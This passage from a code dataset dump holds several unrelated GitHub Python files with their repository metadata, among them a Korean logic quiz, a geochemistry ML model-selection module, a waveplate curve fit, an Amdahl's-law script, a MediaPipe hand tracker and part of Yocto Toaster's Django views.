있을 때 한 과목이라도 50점 미만이면 불합격,\n 다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요.\n'''\nkorean = 92\nenglish = 47\nmathematics = 86\nscience = 81\n\nif korean >= 50 and english >= 50 and mathematics >= 50 and science >= 50:\n print('합격')\nelse:\n print('불합격') \n\n'''\n* 코딩도장 퀴즈\n표준 입력으로 국어, 영어, 수학, 과학 점수가 입력됩니다. 국어는 90점 이상, \n영어는 80점 초과, 수학은 85점 초과, 과학은 80점 이상일 때 합격이라고 정했습니다\n(한 과목이라도 조건에 만족하지 않으면 불합격). \n다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요\n'''\nkor, eng, math, sc = map(int, input().split())\nprint( kor >= 90 and eng > 80 and math > 85 and sc >= 80)\n","repo_name":"suyeon0610/python","sub_path":"Basic/logical_operator.py","file_name":"logical_operator.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12042137392","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pandas as pd\nfrom multipledispatch import dispatch\n\nfrom ..constants import MLFLOW_ARTIFACT_DATA_PATH\nfrom ..model.classification import (\n ClassificationWorkflowBase,\n DecisionTreeClassification,\n ExtraTreesClassification,\n GradientBoostingClassification,\n KNNClassification,\n LogisticRegressionClassification,\n MLPClassification,\n RandomForestClassification,\n SVMClassification,\n XgboostClassification,\n)\nfrom ._base import ModelSelectionBase\n\n\nclass ClassificationModelSelection(ModelSelectionBase):\n \"\"\"Simulate the normal way of training classification algorithms.\"\"\"\n\n def __init__(self, model_name: str) -> None:\n self.model_name = model_name\n self.clf_workflow = ClassificationWorkflowBase()\n self.transformer_config = {}\n\n @dispatch(object, object, object, object, object, object)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n ) -> None:\n \"\"\"Train by Scikit-learn framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n hyper_parameters = SVMClassification.manual_hyper_parameters()\n self.clf_workflow = SVMClassification(\n kernel=hyper_parameters[\"kernel\"],\n degree=hyper_parameters[\"degree\"],\n gamma=hyper_parameters[\"gamma\"],\n C=hyper_parameters[\"C\"],\n shrinking=hyper_parameters[\"shrinking\"],\n )\n elif self.model_name == \"Decision Tree\":\n hyper_parameters = DecisionTreeClassification.manual_hyper_parameters()\n self.clf_workflow = DecisionTreeClassification(\n criterion=hyper_parameters[\"criterion\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n )\n elif self.model_name == \"Random Forest\":\n hyper_parameters = RandomForestClassification.manual_hyper_parameters()\n self.clf_workflow = RandomForestClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n 
min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Xgboost\":\n hyper_parameters = XgboostClassification.manual_hyper_parameters()\n self.clf_workflow = XgboostClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n subsample=hyper_parameters[\"subsample\"],\n colsample_bytree=hyper_parameters[\"colsample_bytree\"],\n alpha=hyper_parameters[\"alpha\"],\n lambd=hyper_parameters[\"lambd\"],\n )\n elif self.model_name == \"Logistic Regression\":\n hyper_parameters = LogisticRegressionClassification.manual_hyper_parameters()\n self.clf_workflow = LogisticRegressionClassification(\n penalty=hyper_parameters[\"penalty\"],\n C=hyper_parameters[\"C\"],\n solver=hyper_parameters[\"solver\"],\n max_iter=hyper_parameters[\"max_iter\"],\n class_weight=hyper_parameters[\"class_weight\"],\n l1_ratio=hyper_parameters[\"l1_ratio\"],\n )\n elif self.model_name == \"Multi-layer Perceptron\":\n hyper_parameters = MLPClassification.manual_hyper_parameters()\n self.clf_workflow = MLPClassification(\n hidden_layer_sizes=hyper_parameters[\"hidden_layer_sizes\"],\n activation=hyper_parameters[\"activation\"],\n solver=hyper_parameters[\"solver\"],\n alpha=hyper_parameters[\"alpha\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_iter=hyper_parameters[\"max_iter\"],\n )\n elif self.model_name == \"Extra-Trees\":\n hyper_parameters = ExtraTreesClassification.manual_hyper_parameters()\n self.clf_workflow = ExtraTreesClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n bootstrap=hyper_parameters[\"bootstrap\"],\n oob_score=hyper_parameters[\"oob_score\"],\n max_samples=hyper_parameters[\"max_samples\"],\n )\n elif self.model_name == \"Gradient Boosting\":\n hyper_parameters = GradientBoostingClassification.manual_hyper_parameters()\n self.clf_workflow = GradientBoostingClassification(\n n_estimators=hyper_parameters[\"n_estimators\"],\n learning_rate=hyper_parameters[\"learning_rate\"],\n max_depth=hyper_parameters[\"max_depth\"],\n min_samples_split=hyper_parameters[\"min_samples_split\"],\n min_samples_leaf=hyper_parameters[\"min_samples_leaf\"],\n max_features=hyper_parameters[\"max_features\"],\n subsample=hyper_parameters[\"subsample\"],\n loss=hyper_parameters[\"loss\"],\n )\n elif self.model_name == \"K-Nearest Neighbors\":\n hyper_parameters = KNNClassification.manual_hyper_parameters()\n self.clf_workflow = KNNClassification(\n n_neighbors=hyper_parameters[\"n_neighbors\"],\n weights=hyper_parameters[\"weights\"],\n algorithm=hyper_parameters[\"algorithm\"],\n leaf_size=hyper_parameters[\"leaf_size\"],\n p=hyper_parameters[\"p\"],\n metric=hyper_parameters[\"metric\"],\n )\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train)\n y_test_predict = self.clf_workflow.predict(X_test)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, 
y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n self.clf_workflow.save_hyper_parameters(hyper_parameters, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components()\n\n # Special components of different algorithms\n self.clf_workflow.special_components()\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained model\n self.clf_workflow.model_save()\n\n @dispatch(object, object, object, object, object, object, bool)\n def activate(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n X_train: pd.DataFrame,\n X_test: pd.DataFrame,\n y_train: pd.DataFrame,\n y_test: pd.DataFrame,\n is_automl: bool,\n ) -> None:\n \"\"\"Train by FLAML framework + RAY framework.\"\"\"\n\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n\n # Customize label\n y, y_train, y_test = self.clf_workflow.customize_label(y, y_train, y_test, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Sample balance\n sample_balance_config, X_train, y_train = self.clf_workflow.sample_balance(X_train, y_train, os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH)\n\n # Model option\n if self.model_name == \"Support Vector Machine\":\n self.clf_workflow = SVMClassification()\n elif self.model_name == \"Decision Tree\":\n self.clf_workflow = DecisionTreeClassification()\n elif self.model_name == \"Random Forest\":\n self.clf_workflow = RandomForestClassification()\n elif self.model_name == \"Xgboost\":\n self.clf_workflow = XgboostClassification()\n elif self.model_name == \"Logistic Regression\":\n self.clf_workflow = LogisticRegressionClassification()\n elif self.model_name == \"Multi-layer Perceptron\":\n self.clf_workflow = MLPClassification()\n elif self.model_name == \"Extra-Trees\":\n self.clf_workflow = ExtraTreesClassification()\n elif self.model_name == \"Gradient Boosting\":\n self.clf_workflow = GradientBoostingClassification()\n elif self.model_name == \"K-Nearest Neighbors\":\n self.clf_workflow = KNNClassification()\n\n self.clf_workflow.show_info()\n\n # Use Scikit-learn style API to process input data\n self.clf_workflow.fit(X_train, y_train, is_automl)\n y_test_predict = self.clf_workflow.predict(X_test, is_automl)\n y_test_predict = self.clf_workflow.np2pd(y_test_predict, y_test.columns)\n self.clf_workflow.data_upload(X=X, y=y, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test, y_test_predict=y_test_predict)\n\n # Save the model hyper-parameters\n if self.clf_workflow.ray_best_model is not None:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.ray_best_model.get_params(), self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n else:\n self.clf_workflow.save_hyper_parameters(self.clf_workflow.automl.best_config, self.model_name, os.getenv(\"GEOPI_OUTPUT_PARAMETERS_PATH\"))\n\n # Common components for every classification algorithm\n self.clf_workflow.common_components(is_automl)\n\n # Special components of different algorithms\n self.clf_workflow.special_components(is_automl)\n\n # Save the prediction result\n self.clf_workflow.data_save(y_test_predict, \"Y Test Predict\", os.getenv(\"GEOPI_OUTPUT_ARTIFACTS_DATA_PATH\"), MLFLOW_ARTIFACT_DATA_PATH, \"Model Prediction\")\n\n # Save the trained 
model\n self.clf_workflow.model_save(is_automl)\n","repo_name":"ZJUEarthData/geochemistrypi","sub_path":"geochemistrypi/data_mining/process/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"} +{"seq_id":"44250696471","text":"from lab_framework import Manager, analysis\nfrom numpy import sin, cos, deg2rad, inf\nimport matplotlib.pyplot as plt\n\ndef fit_func(theta, phi, alpha, N, C):\n return N*(cos(deg2rad(alpha))**2 - 0.5*cos(2*deg2rad(alpha))*sin(2*deg2rad(theta-phi))**2) + C\n\nif __name__ == '__main__':\n \n TRIAL = 2\n SWEEP_PARAMS = [-15, -3, 30, 5, 3]\n UVHWP_ANGLE = 0\n\n '''\n # initialize the manager\n m = Manager(config='../config.json')\n\n # log session info\n m.log(f'AQWP.py TRIAL # {TRIAL}; SWEEP PARAMS = {SWEEP_PARAMS}; UVHWP ANGLE = {UVHWP_ANGLE}')\n\n # configure the UVHWP to produce _something_\n m.C_UV_HWP.goto(UVHWP_ANGLE)\n\n # sweep alice's quarter waveplate\n m.sweep('A_QWP', *SWEEP_PARAMS)\n\n # get the output\n df = m.output_data(f'AQWP_sweep{TRIAL}.csv')\n m.shutdown()\n '''\n\n df = Manager.load_data('AQWP_sweep1.csv')\n \n # fit the function\n params = analysis.fit(fit_func, df['A_QWP'], df['C4'], p0=[0, 90.1518, 2423, -46], bounds=[[-180, -180, -inf, -inf], [180, 180, inf, inf]], maxfev=1000)\n # params = analysis.fit('quadratic', df['A_QWP'], df['C4'])\n\n # print fitted parameters\n print(f'Fit parameters = {params}')\n\n # plotting\n # analysis.plot_func('quadratic', params, df['A_QWP'], color='b', linestyle='dashed', label=f'Fit Function', alpha=0.3)\n fig = plt.figure(figsize=(9,6))\n ax = fig.add_subplot(1,1,1)\n analysis.plot_func(fit_func, params, df['A_QWP'], color='b', linestyle='dashed', label=f'${params[2].n:.3f}[\\\\cos^2({params[1].n:.3f})+\\\\cos(2\\\\cdot{params[1].n:.3f})\\\\sin^2(2(\\\\theta{params[0].n:.3f}))/2]+{params[3].n:.3f}$', alpha=0.3)\n analysis.plot_errorbar(df['A_QWP'], df['C4'], ms=0.1, fmt='ro', capsize=2, label='Data')\n plt.xlabel('Alice\\'s QWP Angle (degrees)')\n plt.ylabel('Count Rate (#/s)')\n plt.legend()\n # plt.title(f'Fit=${params[1].n:.3f}(x-{params[0].n:.3f})^2 + {params[2].n:.3f}$')\n plt.title(f'Alice QWP Sweep')\n plt.savefig(f'AQWP_fit.png', dpi=600)\n plt.show()\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"calibration/AQWP/AQWP_fit.py","file_name":"AQWP_fit.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38117359183","text":"from gekko import GEKKO\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n### Code for this project was written by Brent M. 
Lund ###\r\n\r\nfor num in range(1, 10): #This is Amdahl's Law\r\n variable = 1 / num #variable represents the percentage change for the equation or fraction enhanced\r\n variable1 = (1 - variable) # 1 - by the fraction enhanced\r\n variable2 = (variable / num) #fraction enhanced / number of core processors\r\n variable3 = variable1 + variable2 #Variable1 was added to variable2\r\n variable4 = 1 / variable3 #divided one by the final product of variable 3\r\n print(\"Processor cores Added: \", num)\r\n print(\"Final Point of Amdel's Law: \", variable4)\r\n\r\nresult = [1, 1.3333, 1.28, 1.23, 1.19, 1.16, 1.13, 1.12]\r\nplt.plot(result)\r\nplt.show()\r\n\r\nprint(\"An Amdel Law derivative: \")\r\ndef Amdel_Law_derivative(derivative): #derivitave of Amdel's_Law\r\n k = .03\r\n derivative_V = derivative * (derivative + 1) #multiplied fraction enhanced with-\r\n derivative_X = (derivative - (derivative - 1 *(k))) #the number of core processors\r\n derivative_Y = (derivative_X) * (derivative_X) #the number of core processors-\r\n derivative_Z = derivative_V / derivative_Y\r\n #subtracted it by fraction enhanced\r\n #multiplied this result by itself\r\n print(derivative_Z)\r\n\r\nAmdel_Law_derivative(1)\r\nAmdel_Law_derivative(2)\r\nAmdel_Law_derivative(3)\r\nAmdel_Law_derivative(4)\r\nAmdel_Law_derivative(5)\r\nAmdel_Law_derivative(6)\r\nAmdel_Law_derivative(7)\r\nAmdel_Law_derivative(8)\r\n\r\n# function that returns dy/dt\r\ndef model(y, t): #applied my derivative of Amdel's_Law above-\r\n #and plugged it into the model function\r\n dev_v = y * (y + 1)\r\n dev_x = (y - (y - 1 * (.03)))\r\n dev_y = (dev_x) * (dev_x)\r\n dev_z = dev_v / dev_y\r\n dydt = dev_z\r\n return dydt\r\n\r\n# initial condition\r\ny0 = 1\r\n\r\n# time points\r\nt = np.linspace(0, 1000) # shows my eleven points between 0 and 10\r\n\r\ny = odeint(model, y0, t)\r\n\r\n# plot results\r\nplt.plot(t, y)\r\nplt.xlabel('time')\r\nplt.ylabel('y(t)')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Myron000/CST-305","sub_path":"Amdel's_Law.py","file_name":"Amdel's_Law.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2914359549","text":"import subprocess\nimport sys\nimport os\n\npackages = [\n \"statsmodels==0.11.1\",\n \"xgboost==0.90\",\n \"numpy==1.16.1\",\n \"glibc\",\n \"lxml\",\n \"sklearn-pandas\",\n \"lightgbm\",\n \"pandas\",\n \"numpy\",\n \"pytest-cov\",\n \"pytest\",\n \"codecov\",\n \"xmlschema\",\n \"scikit-learn==0.23.1\"\n]\n\ndef installPackage(package):\n subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", package])\n\nif __name__ == \"__main__\":\n for pck in packages:\n installPackage(pck)","repo_name":"mohammedfazil003/nyoka","sub_path":"nyoka/tests/_install_dependencies.py","file_name":"_install_dependencies.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"595773134","text":"#!/usr/bin/env python3\n\nimport sys\n\nif len(sys.argv) > 1:\n f = open( sys.argv[1] )\nelse:\n f = sys.stdin\n#just open file of interest with standard argument, first part is unnecessary \nfor line in f:\n if \"DROME\" in line:\n #drome refers to correct species\n fields = line.rstrip(\"\\r\\n\").split()\n #whitespace deliniation\n if fields[-1].startswith(\"FBgn\"):\n #look at the last column, they have to start with the FBgn to be counted in the printed dataset\n print(fields[3] 
+ \" \" + fields[2])\n #prints two columns, first has flybase ID and second has uniprot ID","repo_name":"clmcnerney/qbb2018-answers","sub_path":"day2-homework/day2-homework-1.py","file_name":"day2-homework-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52345756506","text":"import mediapipe\nimport cv2\nmedhands=mediapipe.solutions.hands\ndraw=mediapipe.solutions.drawing_utils\nhands=medhands.Hands(max_num_hands=1,min_detection_confidence=0.7)\n\ncap=cv2.VideoCapture(0)\nwhile True:\n success,img=cap.read()\n img=cv2.flip(img,1)\n imgrgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n res=hands.process(imgrgb)\n \n cv2.rectangle(img,(20,350),(90,440),(0,255,0),cv2.FILLED)\n tipids=[4,8,12,16,20]\n lmlist=[]\n\n if res.multi_hand_landmarks:\n for handlms in res.multi_hand_landmarks:\n for id,lm in enumerate(handlms.landmark):\n cx=lm.x\n cy=lm.y\n lmlist.append([id,cx,cy])\n \n if len(lmlist)!=0 and len(lmlist)==21:\n\n fingerlist=[]\n\n for i in range(0,5):\n\n if lmlist[tipids[i]][2]>>> could not print text')\r\n for item in node:\r\n getXMLData(item)\r\n else:\r\n return 0\r\n \r\n \r\ndef scan(): \r\n tree = etree.parse(xml_45_CFR_Section_11_10)\r\n root = tree.getroot()\r\n getXMLData(root)\r\n #print (g)\r\n \r\ndef main(): \r\n scan()\r\n \r\nif __name__ == \"__main__\": \r\n # calling main function \r\n main() \r\n\r\n\r\n","repo_name":"noblecook/research","sub_path":"PhDProject/edu/ttu/phd/tacm/RegulationTrainingSet.py","file_name":"RegulationTrainingSet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70103136008","text":"import re\n\nfrom django.db.models import F, Q, Sum\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.http import urlencode\nfrom orm.models import Build, Target, Task, Layer, Layer_Version, Recipe\nfrom orm.models import LogMessage, Variable, Package_Dependency, Package\nfrom orm.models import Task_Dependency, Package_File\nfrom orm.models import Target_Installed_Package, Target_File\nfrom orm.models import TargetKernelFile, TargetSDKFile, Target_Image_File\nfrom orm.models import BitbakeVersion, CustomImageRecipe\n\nfrom django.urls import reverse, resolve\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseNotFound, JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta, datetime\nfrom toastergui.templatetags.projecttags import json as jsonfilter\nfrom decimal import Decimal\nimport json\nimport os\nfrom os.path import dirname\nimport mimetypes\n\nimport logging\n\nfrom toastermain.logs import log_view_mixin\n\nlogger = logging.getLogger(\"toaster\")\n\n# Project creation and managed build enable\nproject_enable = ('1' == os.environ.get('TOASTER_BUILDSERVER'))\nis_project_specific = ('1' == os.environ.get('TOASTER_PROJECTSPECIFIC'))\n\nclass MimeTypeFinder(object):\n # setting this to False enables additional non-standard mimetypes\n # to be included in the guess\n _strict = False\n\n # returns the mimetype for a file path as a string,\n # or 'application/octet-stream' if the type couldn't be guessed\n @classmethod\n def get_mimetype(self, path):\n guess = mimetypes.guess_type(path, self._strict)\n guessed_type = guess[0]\n if guessed_type is None:\n 
guessed_type = 'application/octet-stream'\n return guessed_type\n\n# single point to add global values into the context before rendering\n@log_view_mixin\ndef toaster_render(request, page, context):\n context['project_enable'] = project_enable\n context['project_specific'] = is_project_specific\n return render(request, page, context)\n\n\n# all new sessions should come through the landing page;\n# determine in which mode we are running in, and redirect appropriately\ndef landing(request):\n # in build mode, we redirect to the command-line builds page\n # if there are any builds for the default (cli builds) project\n default_project = Project.objects.get_or_create_default_project()\n default_project_builds = Build.objects.filter(project = default_project)\n\n # we only redirect to projects page if there is a user-generated project\n num_builds = Build.objects.all().count()\n user_projects = Project.objects.filter(is_default = False)\n has_user_project = user_projects.count() > 0\n\n if num_builds == 0 and has_user_project:\n return redirect(reverse('all-projects'), permanent = False)\n\n if num_builds > 0:\n return redirect(reverse('all-builds'), permanent = False)\n\n context = {'lvs_nos' : Layer_Version.objects.all().count()}\n\n return toaster_render(request, 'landing.html', context)\n\ndef objtojson(obj):\n from django.db.models.query import QuerySet\n from django.db.models import Model\n\n if isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, timedelta):\n return obj.total_seconds()\n elif isinstance(obj, QuerySet) or isinstance(obj, set):\n return list(obj)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif type(obj).__name__ == \"RelatedManager\":\n return [x.pk for x in obj.all()]\n elif hasattr( obj, '__dict__') and isinstance(obj, Model):\n d = obj.__dict__\n nd = dict(d)\n for di in d.keys():\n if di.startswith(\"_\"):\n del nd[di]\n elif isinstance(d[di], Model):\n nd[di] = d[di].pk\n elif isinstance(d[di], int) and hasattr(obj, \"get_%s_display\" % di):\n nd[di] = getattr(obj, \"get_%s_display\" % di)()\n return nd\n elif isinstance( obj, type(lambda x:x)):\n import inspect\n return inspect.getsourcelines(obj)[0]\n else:\n raise TypeError(\"Unserializable object %s (%s) of type %s\" % ( obj, dir(obj), type(obj)))\n\n\ndef _lv_to_dict(prj, x = None):\n if x is None:\n def wrapper(x):\n return _lv_to_dict(prj, x)\n return wrapper\n\n return {\"id\": x.pk,\n \"name\": x.layer.name,\n \"tooltip\": \"%s | %s\" % (x.layer.vcs_url,x.get_vcs_reference()),\n \"detail\": \"(%s\" % x.layer.vcs_url + (\")\" if x.release is None else \" | \"+x.get_vcs_reference()+\")\"),\n \"giturl\": x.layer.vcs_url,\n \"layerdetailurl\" : reverse('layerdetails', args=(prj.id,x.pk)),\n \"revision\" : x.get_vcs_reference(),\n }\n\n\ndef _build_page_range(paginator, index = 1):\n try:\n page = paginator.page(index)\n except PageNotAnInteger:\n page = paginator.page(1)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n\n\n page.page_range = [page.number]\n crt_range = 0\n for i in range(1,5):\n if (page.number + i) <= paginator.num_pages:\n page.page_range = page.page_range + [ page.number + i]\n crt_range +=1\n if (page.number - i) > 0:\n page.page_range = [page.number -i] + page.page_range\n crt_range +=1\n if crt_range == 4:\n break\n return page\n\n\ndef _verify_parameters(g, mandatory_parameters):\n miss = []\n for mp in mandatory_parameters:\n if not mp in g:\n miss.append(mp)\n if len(miss):\n return miss\n return None\n\ndef _redirect_parameters(view, g, 
mandatory_parameters, *args, **kwargs):\n try:\n from urllib import unquote, urlencode\n except ImportError:\n from urllib.parse import unquote, urlencode\n url = reverse(view, kwargs=kwargs)\n params = {}\n for i in g:\n params[i] = g[i]\n for i in mandatory_parameters:\n if not i in params:\n params[i] = unquote(str(mandatory_parameters[i]))\n\n return redirect(url + \"?%s\" % urlencode(params), permanent = False, **kwargs)\n\nclass RedirectException(Exception):\n def __init__(self, view, g, mandatory_parameters, *args, **kwargs):\n super(RedirectException, self).__init__()\n self.view = view\n self.g = g\n self.mandatory_parameters = mandatory_parameters\n self.oargs = args\n self.okwargs = kwargs\n\n def get_redirect_response(self):\n return _redirect_parameters(self.view, self.g, self.mandatory_parameters, self.oargs, **self.okwargs)\n\nFIELD_SEPARATOR = \":\"\nAND_VALUE_SEPARATOR = \"!\"\nOR_VALUE_SEPARATOR = \"|\"\nDESCENDING = \"-\"\n\ndef __get_q_for_val(name, value):\n if \"OR\" in value or \"AND\" in value:\n result = None\n for x in value.split(\"OR\"):\n x = __get_q_for_val(name, x)\n result = result | x if result else x\n return result\n if \"AND\" in value:\n result = None\n for x in value.split(\"AND\"):\n x = __get_q_for_val(name, x)\n result = result & x if result else x\n return result\n if value.startswith(\"NOT\"):\n value = value[3:]\n if value == 'None':\n value = None\n kwargs = { name : value }\n return ~Q(**kwargs)\n else:\n if value == 'None':\n value = None\n kwargs = { name : value }\n return Q(**kwargs)\n\ndef _get_filtering_query(filter_string):\n\n search_terms = filter_string.split(FIELD_SEPARATOR)\n and_keys = search_terms[0].split(AND_VALUE_SEPARATOR)\n and_values = search_terms[1].split(AND_VALUE_SEPARATOR)\n\n and_query = None\n for kv in zip(and_keys, and_values):\n or_keys = kv[0].split(OR_VALUE_SEPARATOR)\n or_values = kv[1].split(OR_VALUE_SEPARATOR)\n query = None\n for key, val in zip(or_keys, or_values):\n x = __get_q_for_val(key, val)\n query = query | x if query else x\n\n and_query = and_query & query if and_query else query\n\n return and_query\n\ndef _get_toggle_order(request, orderkey, toggle_reverse = False):\n if toggle_reverse:\n return \"%s:+\" % orderkey if request.GET.get('orderby', \"\") == \"%s:-\" % orderkey else \"%s:-\" % orderkey\n else:\n return \"%s:-\" % orderkey if request.GET.get('orderby', \"\") == \"%s:+\" % orderkey else \"%s:+\" % orderkey\n\ndef _get_toggle_order_icon(request, orderkey):\n if request.GET.get('orderby', \"\") == \"%s:+\"%orderkey:\n return \"down\"\n elif request.GET.get('orderby', \"\") == \"%s:-\"%orderkey:\n return \"up\"\n else:\n return None\n\n# we check that the input comes in a valid form that we can recognize\ndef _validate_input(field_input, model):\n\n invalid = None\n\n if field_input:\n field_input_list = field_input.split(FIELD_SEPARATOR)\n\n # Check we have only one colon\n if len(field_input_list) != 2:\n invalid = \"We have an invalid number of separators: \" + field_input + \" -> \" + str(field_input_list)\n return None, invalid\n\n # Check we have an equal number of terms both sides of the colon\n if len(field_input_list[0].split(AND_VALUE_SEPARATOR)) != len(field_input_list[1].split(AND_VALUE_SEPARATOR)):\n invalid = \"Not all arg names got values\"\n return None, invalid + str(field_input_list)\n\n # Check we are looking for a valid field\n valid_fields = [f.name for f in model._meta.get_fields()]\n for field in field_input_list[0].split(AND_VALUE_SEPARATOR):\n if True in 
[field.startswith(x) for x in valid_fields]:\n break\n else:\n return None, (field, valid_fields)\n\n return field_input, invalid\n\n# uses search_allowed_fields in orm/models.py to create a search query\n# for these fields with the supplied input text\ndef _get_search_results(search_term, queryset, model):\n search_object = None\n for st in search_term.split(\" \"):\n queries = None\n for field in model.search_allowed_fields:\n query = Q(**{field + '__icontains': st})\n queries = queries | query if queries else query\n\n search_object = search_object & queries if search_object else queries\n queryset = queryset.filter(search_object)\n\n return queryset\n\n\n# function to extract the search/filter/ordering parameters from the request\n# it uses the request and the model to validate input for the filter and orderby values\ndef _search_tuple(request, model):\n ordering_string, invalid = _validate_input(request.GET.get('orderby', ''), model)\n if invalid:\n raise BaseException(\"Invalid ordering model:\" + str(model) + str(invalid))\n\n filter_string, invalid = _validate_input(request.GET.get('filter', ''), model)\n if invalid:\n raise BaseException(\"Invalid filter \" + str(invalid))\n\n search_term = request.GET.get('search', '')\n return (filter_string, search_term, ordering_string)\n\n\n# returns a lazy-evaluated queryset for a filter/search/order combination\ndef _get_queryset(model, queryset, filter_string, search_term, ordering_string, ordering_secondary=''):\n if filter_string:\n filter_query = _get_filtering_query(filter_string)\n queryset = queryset.filter(filter_query)\n else:\n queryset = queryset.all()\n\n if search_term:\n queryset = _get_search_results(search_term, queryset, model)\n\n if ordering_string:\n column, order = ordering_string.split(':')\n if column == re.sub('-','',ordering_secondary):\n ordering_secondary=''\n if order.lower() == DESCENDING:\n column = '-' + column\n if ordering_secondary:\n queryset = queryset.order_by(column, ordering_secondary)\n else:\n queryset = queryset.order_by(column)\n\n # insure only distinct records (e.g. from multiple search hits) are returned\n return queryset.distinct()\n\n# returns the value of entries per page and the name of the applied sorting field.\n# if the value is given explicitly as a GET parameter it will be the first selected,\n# otherwise the cookie value will be used.\ndef _get_parameters_values(request, default_count, default_order):\n current_url = resolve(request.path_info).url_name\n pagesize = request.GET.get('count', request.session.get('%s_count' % current_url, default_count))\n orderby = request.GET.get('orderby', request.session.get('%s_orderby' % current_url, default_order))\n return (pagesize, orderby)\n\n\n# set cookies for parameters. 
